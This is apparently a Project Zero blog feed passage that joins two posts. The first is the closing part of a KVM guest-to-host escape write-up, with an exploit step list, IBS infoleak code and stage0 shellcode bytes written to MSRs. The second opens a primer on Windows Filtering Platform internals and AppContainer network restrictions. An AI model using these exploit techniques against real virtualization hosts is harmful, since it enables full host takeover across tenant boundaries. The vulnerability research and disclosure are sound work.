Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  svm_set_gif(svm,Β true);

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  ...Β Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  /*

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β * Free the nested guest state, unless we are in SMM.

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β * In this case we will return to the nested guest

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β * as soon as we leave SMM.

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β */

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  ifΒ (!is_smm(&svm->vcpu))

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  svm_free_nested(svm);

Β  Β  Β  Β  Β  Β  Β  Β  }Β ...

}

}

For the β€œdisable SVME” case, KVM will first call svm_leave_nestedΒ to forcibly leave potential

nested guests and then free the svm->nestedΒ data structures (including the backing pages for the MSR permission bitmap) in svm_free_nested. As svm_leave_nestedΒ believes that svm->nested.hsaveΒ contains the saved context of the L1 guest, it simply copies its control area to the real VMCB:

voidΒ svm_leave_nested(structΒ vcpu_svm *svm)

{

Β  Β  Β  Β  ifΒ (is_guest_mode(&svm->vcpu))Β {

Β  Β  Β  Β  Β  Β  Β  Β  structΒ vmcb *hsave =Β svm->nested.hsave;

Β  Β  Β  Β  Β  Β  Β  Β  structΒ vmcb *vmcb =Β svm->vmcb;

Β  Β  Β  Β  Β  Β  Β  Β  ...

Β  Β  Β  Β  Β  Β  Β  Β  copy_vmcb_control_area(&vmcb->control,Β &hsave->control);

Β  Β  Β  Β  Β  Β  Β  Β  ...

Β  Β  Β  Β  }

}

But as mentioned before, svm->nested.hsave->control.msrpm_base_paΒ can still point to

svm->nested->msrpm. Once svm_free_nestedΒ is finished and KVM passes control back to the guest, the CPU will use the freed pages for its MSR permission checks. This gives a guest unrestricted access to host MSRs if the pages are reused and partially overwritten with zeros.

To summarize, a malicious guest can gain access to host MSRs using the following approach:

  1. Enable the SVME bit in MSR_EFER to enable nested virtualization
  2. Repeatedly try to launch a L2 guest using the VMRUN instruction while flipping the INTERCEPT_VMRUN bit on a second CPU core.
  3. If VMRUN succeeds, try to launch a β€œL3” guest using another invocation of VMRUN. If this fails, we have lost the race in step 2 and must try again. If VMRUN succeeds we have successfully overwritten svm->nested.hsaveΒ with our L2 context. Β 
  4. Clear the SVME bit in MSR_EFER while still running in the β€œL3” context. This frees the MSR permission bitmap backing pages used by the L2 guest who is now executing again.
  5. Wait until the KVM host reuses the backing pages. This will potentially clear all or some of the bits, giving the guest access to host MSRs.

When I initially discovered and reported this vulnerability, I was feeling pretty confident that this type of MSR access should be more or less equivalent to full code execution on the host. While my feeling turned out to be correct, getting there still took me multiple weeks of exploit development. In the next section I’ll describe the steps to turn this primitive into a guest-to-host escape.

The Exploit

Assuming our guest can get full unrestricted access to any MSR (which is only a question of timing thanks to init_on_alloc=1 being the default for most modern distributions), how can we escalate this into running arbitrary code in the context of the KVM host? To answer this question we first need to look at what kind of MSRs are supported on a modern AMD system. Looking at the BIOS and Kernel Developer’s GuideΒ for recent AMD processors we can find a wide range of MSRs starting with well known and widely used ones such as EFER (the Extended Feature Enable Register) or LSTAR (the syscall target address) to rarely used ones like SMI_ON_IO_TRAP (can be used to generate a System Management Mode Interrupt when specific IO port ranges are accessed).

Looking at the list, several registers like LSTAR or KERNEL_GSBASE seem like interesting targets for redirecting the execution of the host kernel. Unrestricted access to these registers is actually enabled by default, however they are automatically restored to a valid state by KVM after a vmexit so modifying them does not lead to any changes in host behavior.

Still, there is one MSR that we previously mentioned and that seems to give us a straightforward way to achieve code execution: The VM_HSAVE_PA that stores the physical address of the host save area, which is used to restore the host context when a vmexit occurs. If we can point this MSR at a memory location under our control we should be able to fake a malicious host context and execute our own code after a vmexit.

While this sounds pretty straightforward in theory, implementing it still has some challenges:

  • AMD is pretty clear about the fact that software should not touch the host save area in any way and that the data stored in this area is CPU-dependent: β€œProcessor implementations may store only part or none of host state in the memory area pointed to by VM_HSAVE_PA MSR and may store some or all host state in hidden on-chip memory. Different implementations may choose to save the hidden parts of the host’s segment registers as well as the selectors. For these reasons, software must not rely on the format or contents of the host state save area, nor attempt to change host state by modifying the contents of the host save area.” (AMD64 Architecture Programmer’s Manual, Volume 2: System Programming, Page 477). To strengthen the point, the format of the host save area is undocumented.
  • Debugging issues involving an invalid host state is very tedious as any issue leads to an immediate processor shutdown. Even worse, I wasn’t sure if rewriting the VM_HSAVE_PA MSR while running inside a VM can even work. It’s not really something that should happen during normal operation so in the worst case scenario, overwriting the MSR would just lead to an immediate crash.
  • Even if we can create a valid (but malicious) host save area in our guest, we still need some way to identify its host physical address (HPA). Because our guest runs with nested paging enabled, physical addresses that we can see in the guest (GPAs) are still one address translation away from their HPA equivalent.

After spending some time scrolling through AMD’s documentation, I still decided that VM_HSAVE_PA seems to be the best way forward and decided to tackle these problems one by one.

After dumping the host save area of a normal KVM guest running on an AMD EPYC 7351P CPU, the first problem goes away quickly: As it turns out, the host save area has the same layout as a normal VMCB with only a couple of relevant fields initialized. Even better, the initialized fields include all the saved host information documented in the AMD manual so the fear that all interesting host state is stored in on-chip memory seems to be unfounded.

Saving Host State.Β To ensure that the host can resume operation after #VMEXIT, VMRUN saves at least the following host state information:

  • CS.SEL, NEXT_RIPβ€”The CS selector and rIP of the instruction following the VMRUN. On #VMEXIT the host resumes running at this address.
  • RFLAGS, RAXβ€”Host processor mode and the register used by VMRUN to address the VMCB.
  • SS.SEL, RSPβ€”Stack pointer for host
  • CRO, CR3, CR4, EFERβ€”Paging/operating mode for host
  • IDTR, GDTRβ€”The pseudo-descriptors. VMRUN does not save or restore the host LDTR.
  • ES.SEL and DS.SEL.

Under the mistaken assumption that I solved the problem of creating a fake but valid host save area, I decided to look into building an infoleak that gives me the ability to translate GPAs to HPAs. A couple hours of manual reading led me to an AMD-specific performance monitoring feature called Instruction Based Sampling (IBS). When IBS is enabled by writing the right magic invocation to a set of MSRs, it samples every Nth instruction that is executed and collects a wide range of information about the instruction. This information is logged in another set of MSRs and can be used to analyze the performance of any piece of code running on the CPU. While most of the documentation for IBS is pretty sparse or hard to follow, the very useful open source project AMD IBS ToolkitΒ contains working code, a readable high level description of IBS and a lot of useful references.

IBS supports two different modes of operation, one that samples Instruction fetches and one that samples micro-ops (which you can think of as the internal RISC representation of more complex x64 instructions). Depending on the operation mode, different data is collected. Besides a lot of caching and latency information that we don’t care about, fetch sampling also returns the virtual address and physical address of the fetched instruction. Op sampling is even more useful as it returns the virtual address of the underlying instruction as well as virtual and physical addresses accessed by any load or store micro op.

Interestingly, IBS does not seem to care about the virtualization context of its user and every physical address returned by it is an HPAΒ (of course this is not a problem outside of this exploit as guest accesses to the IBS MSR’s will normally be restricted). The wide range of data returned by IBS and the fact that it’s completely driven by MSR reads and writes make it the perfect tool for building infoleaks for our exploit.

Building a GPA -> HPA leak boils down to enabling IBS ops sampling, executing a lot of instructions that access a specific memory page in our VM and reading the IBS_DC_PHYS_AD MSR to find out its HPA:

// This function leaks the HPA of a guest page using

// AMD's Instruction Based Sampling. We try to sample

// one of our memory loads/writes to *p, which will

// store the physical memory address in MSR_IBC_DH_PHYS_AD

staticΒ u64 leak_guest_hpa(u8 *p)Β {

Β  volatileΒ u8 *ptr =Β p;

Β  u64 ibs =Β scatter_bits(0x2,Β IBS_OP_CUR_CNT_23)Β |

Β  Β  Β  Β  Β  Β  scatter_bits(0x10,Β IBS_OP_MAX_CNT)Β |Β IBS_OP_EN;

Β  whileΒ (true)Β {

Β  Β  wrmsr(MSR_IBS_OP_CTL,Β ibs);

Β  Β  u64 x =Β 0;

Β  Β  forΒ (intΒ i =Β 0;Β i <Β 0x1000;Β i++)Β {

Β  Β  Β  x =Β ptr[i];

Β  Β  Β  ptr[i]Β +=Β ptr[i -Β 1];

Β  Β  Β  ptr[i]Β =Β x;

Β  Β  Β  ifΒ (i %Β 50Β ==Β 0)Β {

Β  Β  Β  Β  u64 valid =Β rdmsr(MSR_IBS_OP_CTL)Β &Β IBS_OP_VAL;

Β  Β  Β  Β  ifΒ (valid)Β {

Β  Β  Β  Β  Β  u64 op3 =Β rdmsr(MSR_IBS_OP_DATA3);

Β  Β  Β  Β  Β  ifΒ ((op3 &Β IBS_ST_OP)Β ||Β (op3 &Β IBS_LD_OP))Β {

Β  Β  Β  Β  Β  Β  ifΒ (op3 &Β IBS_DC_PHY_ADDR_VALID)Β {

Β  Β  Β  Β  Β  Β  Β  printf("[x] leak_guest_hpa: %lx %lx %lx\n",Β rdmsr(MSR_IBS_OP_RIP),

Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β rdmsr(MSR_IBS_DC_PHYS_AD),Β rdmsr(MSR_IBS_DC_LIN_AD));

Β  Β  Β  Β  Β  Β  Β  returnΒ rdmsr(MSR_IBS_DC_PHYS_AD)Β &Β ~(0xFFF);

Β  Β  Β  Β  Β  Β  }

Β  Β  Β  Β  Β  }

Β  Β  Β  Β  Β  wrmsr(MSR_IBS_OP_CTL,Β ibs);

Β  Β  Β  Β  }

Β  Β  Β  }

Β  Β  }

Β  Β  wrmsr(MSR_IBS_OP_CTL,Β ibs &Β ~IBS_OP_EN);

Β  }

}

Using this infoleak primitive, I started to create a fake host save area by preparing my own page tables (for pointing CR3 at them), interrupt descriptor tables and segment descriptors and pointing RIP to a primitive shellcode that would write to the serial console. Of course, my first tries immediately crashed the whole system and even after spending multiple days to make sure everything was set up correctly, the system would crash immediately once I pointed the hsave MSR at my own location.

After getting frustrated with the total lack of progress, watching my server reboot for the hundredth time, trying to come up with a different exploitation strategy for two weeks and learning about the surprising regularity of physical page migrations on Linux, I realized that I made an important mistake. Just because the CPU initializes all the expected fields in the host save area, it is not safe to assume that these fields are actually used for restoring the host context. Slow trial and error led to the discovery that my AMD EPYC CPU ignores everything in the host save area besides the values of the RIP, RSP and RAX registers.

While this register control would make a local privilege escalation straightforward, escaping the VM boundary is a bit more complicated. RIP and RSP control make launching a kernel ROP chain the next logical step, but this requires us to first break the host kernel's address randomization and to find a way to store controlled data at a known host virtual address (HVA).

Fortunately, we have IBS as a powerful infoleak building primitive and can use it to gather all required information in a single run:

  • Leaking the host kernel's (or more specifically kvm-amd.ko’s) base address can be done by enabling IBS sampling with a small sampling interval and immediately triggering a VM exit. When VM execution continues, the IBS result MSRs will contain the HVA of instructions executed by KVM during the exit handling.
  • The most powerful way to store data at a known HVA is to leak the location of the kernel’s linear mapping (also known as physmap), a 1:1 mapping of all physical pages on the system. This gives us a GPA->HVA translation primitive by first using our GPA->HPA infoleak from above and then adding the HPA to the physmap base address. Leaking the physmap is possible by sampling micro ops in the host kernel until we find a read or write operation, where the lower ~30 bits of the accessed virtual address and physical address are identical.

Having all these building blocks in place, we could now try to build a kernel ROP chain that executes some interesting payload. However, there is one important caveat. When we take over execution after a vmexit, the system is still in a somewhat unstable state. As mentioned above, SVM’s context switching is very minimal and we are at least one VMLOAD instruction and reenabling of interrupts away from a usable system. While it is surely possible to exploit this bug and to restore the original host context using a sufficiently complex ROP chain, I decided to find a way to run my own code instead.

A couple of years ago, the Linux physmap was still mapped executable and executing our own code would be as simple as jumping to a physmap mapping of one of our guest pages. Of course, that is not possible anymore and the kernel tries hard to not have any memory pages mapped as writable and executable. Still, page protections only apply to virtual memory accesses so why not use an instruction that directly writes controlled data to a physical address? As you might remember from our initial discussion of SVM earlier in this chapter, SVM supports an instruction called VMSAVE to store hidden guest state (or host state) in a VMCB. Similar to VMRUN, VMSAVE takes a physical address to a VMCB stored in the RAX register as an implicit argument. It then writes the following register state to the VMCB:

  • FS, GS, TR, LDTR
  • KernelGsBase
  • STAR, LSTAR, CSTAR, SFMASK
  • SYSENTER_CS, SYSENTER_ESP, SYSENTER_EIP

For us, VMSAVE is interesting for a couple of reasons:

  • It is used as part of KVM’s normal SVM exit handler and can be easily integrated into a minimal ROP chain.
  • It operates on physical addresses, so we can use it to write to an arbitrary memory location including KVM’s own code.
  • All written registers still contain the guest values set by our VM, allowing us to control the written content with some restrictions

VMSAVE’s biggest downside as an exploitation primitive is that RAX needs to be page aligned, reducing our control of the target address. VMSAVE writes to the memory offsets 0x440-0x480 and 0x600-0x638 so we need to be careful about not corrupting any memory that’s in use.

In our case this turns out to be a non-issue, as KVM contains a couple of code pages where functions that are rarely or never used (e.g cleanup_module or SEV specific code) are stored at these offsets.

While we don’t have full control over the written data and valid register values are somewhat restricted, it is still possible to write a minimal stage0 shellcode to an arbitrary page in the host kernel by filling guest MSRs with the right values. My exploit uses the STAR, LSTAR and CSTAR registers for this which are written to the physical offsets 0x400, 0x408 and 0x410. As all three registers need to containΒ canonical addresses, we can only use parts of the registers for our shellcode and use relative jumps to skip the unusable parts of the STAR and LSTAR MSRs:

Β  // mov cr0, rbx; jmp

Β  wrmsr(MSR_STAR,Β 0x00000003ebc3220f);

Β  // pop rdi; pop rsi; pop rcx; jmp

Β  wrmsr(MSR_LSTAR,Β 0x00000003eb595e5fULL);

Β  // rep movsb; pop rdi; jmp rdi;

Β  wrmsr(MSR_CSTAR,Β 0xe7ff5fa4f3);

The above code makes use of the fact that we control the value of the RBX register and the stack when we return to it as part of our initial ROP chain. First, we copy the value of RBX (0x80040033) into CR0, which disables Write Protection (WP) for kernel memory accesses. This makes all of the kernel code writable on this CPU allowing us to copy a larger stage1 shellcode to an arbitrary unused memory location and jump to it.

Once the WP bit in cr0 is disabled and the stage1 payload executes, we have a wide range of options. For my proof-of-concept exploit I decided on a somewhat boring but easy-to-implement approach to spawn a random user space command: The host is still in a very weird state so our stage1 payload can’t directly call into other kernel functions, but we can easily backdoor a function pointer which will be called at some later point in time. KVM uses the kernel’s global workqueue feature to regularly synchronize a VM’s clock between different vCPUs. The function pointer responsible for this work is stored in the (per VM) kvm->arch data structure as kvm->arch.kvmclock_update_work. The stage1 payload overrides this function pointer with the address of a stage2 payload. To put the host into a usable state it then sets the VM_HSAVE_PA MSR back to its original value and restores RSP and RIP to call the original vmexit handler.

The final stage2 payload executes at some later point in time as part of the kernel global work queue and uses the call_usermodehelper to run an arbitrary command with root privileges.

Let’s put all of this together and walk through the attacks step-by-step:

  1. Prepare the stage0 payload by splitting it up and setting the right guest MSRs.
  2. Trigger the TOCTOU vulnerability in nested_svm_vmrun and free the MSR permission bitmap by disabling the SVME bit in the EFER MSR.
  3. Wait for the pages to be reused and initialized to 0 to get unrestricted MSR access.
  4. Prepare a fake host save area, a stack for the initial ROP chain and a staging memory area for the stage1 and stage2 payloads.
  5. Leak the HPA of the host save area, the HVA addresses of the stack and staging page and the kvm-amd.ko’s base address using the different IBS infoleaks.
  6. Redirect execution to the VMSAVE gadget by setting RIP, RSP and RAX in the fake host save area, pointing the VM_HSAVE_PA MSR at it and triggering a VM exit.
  7. VMSAVE writes the stage0 payload to an unused offset in kvm-amd’s code segment, when the gadget returns stage0 gets executed.
  8. stage0 disables Write Protection in CR0 and overwrites an unused executable memory location with the stage1 and stage2 payloads, before jumping to stage1.
  9. stage1 overwrites kvm->arch.kvmclock_update_work.work.func with a pointer to stage2 before restoring the original host context.
  10. At some later point in time kvm->arch.kvmclock_update_work.work.func is called as part of the global kernel work_queue and stage2 spawns an arbitrary command using call_usermodehelper.

Interested readers should take a look at the heavily documented proof-of-concept exploitΒ for the actual implementation.

Conclusion

This blog post describes a KVM-only VM escape made possible by a small bug in KVM’s AMD-specific code for supporting nested virtualization. Luckily, the feature that made this bug exploitable was only included in two kernel versions (v5.10, v5.11) before the issue was spotted, reducing the real-life impact of the vulnerability to a minimum. The bug and its exploit still serve as a demonstration that highly exploitable security vulnerabilities can still exist in the very core of a virtualization engine, which is almost certainly a small and well audited codebase. While the attack surface of a hypervisor such as KVM is relatively small from a pure LoC perspective, its low level nature, close interaction with hardware and pure complexity makes it very hard to avoid security-critical bugs.

While we have not seen any in-the-wild exploits targeting hypervisors outside of competitions like Pwn2Own, these capabilities are clearly achievable for a well-financed adversary. I’ve spent around two months on this research, working as an individual with only remote access to an AMD system. Looking at the potential ROI on an exploit like this, it seems safe to assume that more people are working on similar issues right now and that vulnerabilities in KVM, Hyper-V, Xen or VMware will be exploited in-the-wild sooner or later.Β 

What can we do about this? Security engineers working on Virtualization Security should push for as much attack surface reduction as possible. Moving complex functionality to memory-safe user space components is a big win even if it does not help against bugs like the one described above. Disabling unneeded or unreviewed features and performing regular in-depth code reviews for new changes can further reduce the risk of bugs slipping by.

Hosters, cloud providers and other enterprises that are relying on virtualization for multi-tenancy isolation should design their architecture in way that limits the impact of an attacker with an VM escape exploit:

  • Isolation of VM hosts: Machines that host untrusted VMs should be considered at least partially untrusted. While a VM escape can give an attacker full control over a single host, it should not be easily possible to move from one compromised host to another. This requires that the control plane and backend infrastructure is sufficiently hardened and that user resources like disk images or encryption keys are only exposed to hosts that need them. OneΒ way to limit the impact of a VM escape even further is to only run VMs of a specific customer or of a certain sensitivity on a single machine.
  • Investing in detection capabilities: In most architectures, the behavior of a VM host should be very predictable, making a compromised host stick out quickly once an attacker tries to move to other systems. While it’s very hard to rule out the possibility of a vulnerability in your virtualization stack, good detection capabilities make life for an attacker much harder and increase the risk of quickly burning a high-value vulnerability. Agents running on the VM host can be a first (but bypassable) detection mechanism, but the focus should be on detecting unusual network communication and resource accesses.

Understanding Network Access in Windows AppContainers

By: Ryan
19 August 2021 at 16:37

Posted by James Forshaw, Project Zero

Recently I'veΒ been delving into the inner workings of the Windows Firewall. This is interesting to me as it's used to enforce various restrictions such as whether AppContainer sandboxed applications can access the network. Being able to bypass network restrictions in AppContainer sandboxes is interesting as it expands the attack surface available to the application, such as being able to access services on localhost, as well as granting access to intranet resources in an Enterprise.

I recently discovered a configuration issueΒ with the Windows Firewall which allowed the restrictions to be bypassed and allowed an AppContainer process to access the network. Unfortunately Microsoft decided it didn't meet the bar for a security bulletin so it's marked as WontFix.

As the mechanism that the Windows Firewall uses to restrict access to the network from an AppContainer isn't officially documented as far as I know, I'll provide the details on how the restrictions are implemented. This will provide the background to understanding why my configuration issue allowed for network access.

I'll also take the opportunity to give an overview of how the Windows Firewall functions and how you can use some of my tooling to inspect the current firewall configuration. This will provide security researchers with the information they need to better understand the firewall and assess its configuration to find other security issues similar to the one I reported. At the same time I'll note some interesting quirks in the implementation which you might find useful.

Windows Firewall Architecture Primer

Before we can understand how network access is controlled in an AppContainer we need to understand how the built-in Windows firewall functions. Prior to XP SP2 Windows didn't have a built-in firewall, and you would typically install a third-party firewall such as ZoneAlarm. These firewalls were implemented by hooking into Network Driver Interface Specification (NDIS)Β drivers or implementing user-mode Winsock Service ProvidersΒ but this was complex and error prone.

While XP SP2 introduced the built-in firewall, the basis for the one used in modern versions of Windows was introduced in Vista as the Windows Filtering Platform (WFP). However, as a user you wouldn't typically interact directly with WFP. Instead you'd use a firewall product which exposes a user interface, and then configures WFP to do the actual firewalling. On a default installation of Windows this would be the Windows Defender Firewall. If you installed a third-party firewall this would replace the Defender component but the actual firewall would still be implemented through configuring WFP.

Architectural diagram of the built-in Windows Firewall. Showing a separation between user components (MPSSVC, BFE) and the kernel components (AFD, TCP/IP, NETIO and Callout Drivers)

The diagram gives an overview of how various components in the OS are connected together to implement the firewall. A user would interact with the Windows Defender firewall using the GUI, or a command line interface such as PowerShell's NetSecurityΒ module. This interface communicates with the Windows Defender Firewall Service (MPSSVC)Β over RPC to query and modify the firewall rules.

MPSSVC converts its ruleset to the lower-level WFP firewall filters and sends them over RPC to the Base Filtering Engine (BFE)Β service. These filters are then uploaded to the TCP/IP driver (TCPIP.SYS)Β in the kernel which is where the firewall processing is handled. The device objects (such as \Device\WFP) which the TCP/IP driver exposes are secured so that only the BFE service can access them. This means all access to the kernel firewall needs to be mediated through the service.

When an application, such as a Web Browser, creates a new network socket the AFD driver responsible for managing sockets will communicate with the TCP/IP driver to configure the socket for IP. At this point the TCP/IP driver will capture the security context of the creating process and store that for later use by the firewall. When an operation is performed on the socket, such as making or accepting a new connection, the firewall filters will be evaluated.

The evaluation is handled primarily by the NETIO driver as well as registered callout drivers. These callout drivers allow for more complex firewall rules to be implemented as well as inspecting and modifying network traffic. The drivers can also forward checks to user-mode services. As an example, the ability to forward checks to user mode allows the Windows Defender Firewall to display a UI when an unknown application listens on a wildcard address, as shown below.

Dialog displayed by the Windows Firewall service when an unknown application tries to listen for incoming connections.

The end result of the evaluation is whether the operation is permitted or blocked. The behavior of a block depends on the operation. If an outbound connection is blocked the caller is notified. If an inbound connection is blocked the firewall will drop the packets and provide no notification to the peer, such as a TCP Reset or ICMP response. This default drop behavior can be changed through a system wide configuration change. Let's dig into more detail on how the rules are configured for evaluation.

Layers, Sublayers and Filters

The firewall rules are configured using three types of object: layers, sublayers and filters as shown in the following diagram.

Diagram showing the relationship between layers, sublayers and filters. Each layer can have one or more sublayers which in turn has one or more associated filters.

The firewall layer is used to categorize the network operation to be evaluated. For example there are separate layers for inbound and outbound packets. This is typically further differentiated by IP version, so there are separate IPv4 and IPv6 layers for inbound and outbound packets. While the firewall is primarily focussed on IP traffic there does exist limited MAC and Virtual Switch layers to perform specialist firewalling operations. You can find the list of pre-defined layers on MSDN here. As the WFP needs to know what layer handles which operation there's no way for additional layers to be added to the system by a third-party application.

When a packet is evaluated by a layer the WFP performs Filter Arbitration. This is a set of rules which determine the order of evaluation of the filters. First WFPΒ enumerates all registered filters which are associated with the layer's unique GUID. Next, WFP groups the filters by their sublayer's GUID and orders the filter groupings by a weight value which was specified when the sublayer was registered. Finally, WFP evaluates each filter according to the order based on a weight value specified when the filter was registered.

For every filter, WFP checks if the list of conditions match the packet and its associated meta-data. If the conditions match then the filter performs a specified action, which can be one of the following:

  • Permit
  • Block
  • Callout Terminating
  • Callout Unknown
  • Callout Inspection

If the action is Permit or BlockΒ then the filter evaluation for the current sublayer is terminated with that action as the result. If the action is a callout then WFP will invoke the filter's registered callout driver's classify functionΒ to perform additional checks. The classify function can evaluate the packet and its meta-data and specify a final result of Permit, Block or additionally Continue which indicates the filter should be ignored. In general if the action is Callout TerminatingΒ then it should only set Permit and Block, and if it's Callout InspectionΒ then it should only set Continue. The Callout UnknownΒ action is for callouts which might terminate or might not depending on the result of the classification.

Once a terminating filter has been evaluated WFP stops processing that sublayer. However, WFP will continue to process the remaining sublayers in the same way regardless of the final result. In general if any sublayer returns a BlockΒ result then the packet will be blocked, otherwise it'll be permitted. This means that if a higher priority sublayer's result is Permit, it can still be blocked by a lower-priority sublayer.

A filter can be configured with the FWPM_FILTER_FLAG_CLEAR_ACTION_RIGHTΒ flag which indicates that the result should be considered β€œhard” allowing a higher priority filter to permit a packet which can't be overridden by a lower-priority blocking filter. The rules for the final result are even more complex than I make out including soft blocks and vetos, refer to the page in MSDNΒ for more information.

Β 

To simplify the classification of network traffic, WFP provides a set of stateful layers which correspond to major network events such as TCP connection and port binding. The stateful filtering is referred to as Application Layer Enforcement (ALE). For example the FWPM_LAYER_ALE_AUTH_CONNECT_V4Β layer will be evaluated when a TCP connection using IPv4 is being made.

For any given connection it will only be evaluated once, not for every packet associated with the TCP connection handshake. In general these ALE layersΒ are the ones we'll focus on when inspecting the firewall configuration, as they're the most commonly used. The three main ALE layers you're going to need to inspect are the following:

Name

Description

FWPM_LAYER_ALE_AUTH_CONNECT_V4/6

Processed when TCP connect() called.

FWPM_LAYER_ALE_AUTH_LISTEN_V4/6

Processed when TCP listen() called.

FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4/6

Processed when a packet/connection is received.

What layers are used and in what order they are evaluated depend on the specific operation being performed. You can find the list of the layers for TCP packets hereΒ and UDP packets here. Now, let's dig into how filter conditions are defined and what information they can check.

Filter Conditions

Each filter contains an optional list of conditions which are used to match a packet. If no list is specified then the filter will always match any incoming packet and perform its defined action. If more than one condition is specified then the filter is only matched if all of the conditions match. If you have multiple conditions of the same type they're OR'ed together, which allows a single filter to match on multiple values.

Each condition contains three values:

  • The layer field to check.
  • The value to compare against.
  • The match type, for example the packet value and the condition value are equal.

Each layer has a list of fields that will be populated whenever a filter's conditions are checked. The field might directly reflect a value from the packet, such as the destination IP address or the interface the packet is traversing. Or it could be a metadata value, such as the user identity of the process which created the socket. Some common fields are as follows:

Field Type

Description

FWPM_CONDITION_IP_REMOTE_ADDRESS

The remote IP address.

FWPM_CONDITION_IP_LOCAL_ADDRESS

The local IP address.

FWPM_CONDITION_IP_PROTOCOL

The IP protocol type, e.g. TCP or UDP

FWPM_CONDITION_IP_REMOTE_PORT

The remote protocol port.

FWPM_CONDITION_IP_LOCAL_PORT

The local protocol port.

FWPM_CONDITION_ALE_USER_ID

The user's identity.

FWPM_CONDITION_ALE_REMOTE_USER_ID

The remote user's identity.

FWPM_CONDITION_ALE_APP_ID

The path to the socket's executable.

FWPM_CONDITION_ALE_PACKAGE_ID

The user's AppContainer package SID.

FWPM_CONDITION_FLAGS

A set of additional flags.

FWPM_CONDITION_ORIGINAL_PROFILE_ID

The source network interface profile.

FWPM_CONDITION_CURRENT_PROFILE_ID

The current network interface profile.

The value to compare against the field can take different values depending on the field being checked. For example the field FWPM_CONDITION_IP_REMOTE_ADDRESSΒ can be compared to IPv4 or IPv6 addresses depending on the layer it's used in. The value can also be a range, allowing a filter to match on an IP address within a bounded set of addresses.

The FWPM_CONDITION_ALE_USER_IDΒ and FWPM_CONDITION_ALE_PACKAGE_IDΒ conditions are based on the access token captured when creating the TCP or UDP socket. The FWPM_CONDITION_ALE_USER_IDΒ stores a security descriptor which is used with an access check with the creator's token. If the token is granted access then the condition is considered to match. For FWPM_CONDITION_ALE_PACKAGE_IDΒ the condition checks the package SID of the AppContainer token. If the token is not an AppContainer then the filtering engine sets the package SID to the NULL SID (S-1-0-0).

The FWPM_CONDITION_ALE_REMOTE_USER_IDΒ is similar to the FWPM_CONDITION_ALE_USER_IDΒ condition but compares against the remote authenticated user. In most cases sockets are not authenticated, however if IPsec is in use that can result in a remote user token being available to compare. It's also used in some higher-level layers such as RPC filters.

The match type can be one of the following:

  • FWP_MATCH_EQUAL
  • FWP_MATCH_EQUAL_CASE_INSENSITIVE
  • FWP_MATCH_FLAGS_ALL_SET
  • FWP_MATCH_FLAGS_ANY_SET
  • FWP_MATCH_FLAGS_NONE_SET
  • FWP_MATCH_GREATER
  • FWP_MATCH_GREATER_OR_EQUAL
  • FWP_MATCH_LESS
  • FWP_MATCH_LESS_OR_EQUAL
  • FWP_MATCH_NOT_EQUAL
  • FWP_MATCH_NOT_PREFIX
  • FWP_MATCH_PREFIX
  • FWP_MATCH_RANGE

The match types should hopefully be self explanatory based on their names. How the match is interpreted depends on the field's type and the value being used to check against.

Inspecting the Firewall Configuration

We now have an idea of the basics of how WFP works to filter network traffic. Let's look at how to inspect the current configuration. We can't use any of the normal firewall commands or UIs such as the PowerShell NetSecurity module as I already mentioned these represent the Windows Defender view of the firewall.

Instead we need to use the RPC APIs BFE exposes to access the configuration, for example you can access a filter using the FwpmFilterGetByKey0Β API. Note that the BFE maintains security descriptors to restrict access to WFP objects. By default nothing can be accessed by non-administrators, therefore you'd need to call the RPC APIs while running as an administrator.

You could implement your own tooling to call all the different APIs, but it'd be much easier if someone had already done it for us. For built-in tools the only one I know of is using netshΒ with the wfp namespace. For example to dump all the currently configured filters you can use the following command as an administrator:

PS> netsh wfp show filters file = -

This will print all filters in an XML format to the console. Be prepared to wait a while for the output to complete. You can also dump straight to a file. Of course you now need to interpret the XML results. It is possible to also specify certain parameters, such as local and remote addresses to reduce the output to only matching filters.

Processing an XML file doesn't sound too appealing. To make the firewall configuration easier to inspect I've added many of the BFE APIs to my NtObjectManagerΒ PowerShell module from version 1.1.32 onwards. The module exposes various commands which will return objects representing the current WFP configuration which you can easily use to inspect and group the results however you see fit.

Layer Configuration

Even though the layers are predefined in the WFP implementation it's still useful to be able to query the details about them. For this you can use the Get-FwLayerΒ command.

PS> Get-FwLayer

KeyName Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Name Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β 

------- Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  ---- Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β 

FWPM_LAYER_OUTBOUND_IPPACKET_V6 Β  Outbound IP Packet v6 Layer Β  Β  Β  Β  Β  Β 

FWPM_LAYER_IPFORWARD_V4_DISCARD Β  IP Forward v4 Discard Layer Β  Β  Β  Β  Β  Β 

FWPM_LAYER_ALE_AUTH_LISTEN_V4 Β  Β  ALE Listen v4 Layer

...

The output shows the SDK name for the layer, if it has one, and the name of the layer that the BFE service has configured. The layer can be queried by its SDK name, its GUID or a numeric ID, which we will come back to later. As we mostly only care about the ALE layers then there's a special AleLayerΒ parameter to query a specific layer without needing to remember the full name or ID.

PS> (Get-FwLayer -AleLayer ConnectV4).Fields

KeyName Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β Type Β  Β  Β DataType Β  Β  Β  Β  Β  Β  Β 

------- Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β  Β ---- Β  Β  Β -------- Β  Β  Β  Β  Β  Β  Β 

FWPM_CONDITION_ALE_APP_ID Β  Β  Β  Β RawData Β  ByteBlob Β  Β  Β  Β  Β  Β  Β 

FWPM_CONDITION_ALE_USER_ID Β  Β  Β  RawData Β  TokenAccessInformation

FWPM_CONDITION_IP_LOCAL_ADDRESS Β IPAddress UInt32 Β  Β  Β  Β  Β  Β  Β  Β 

...

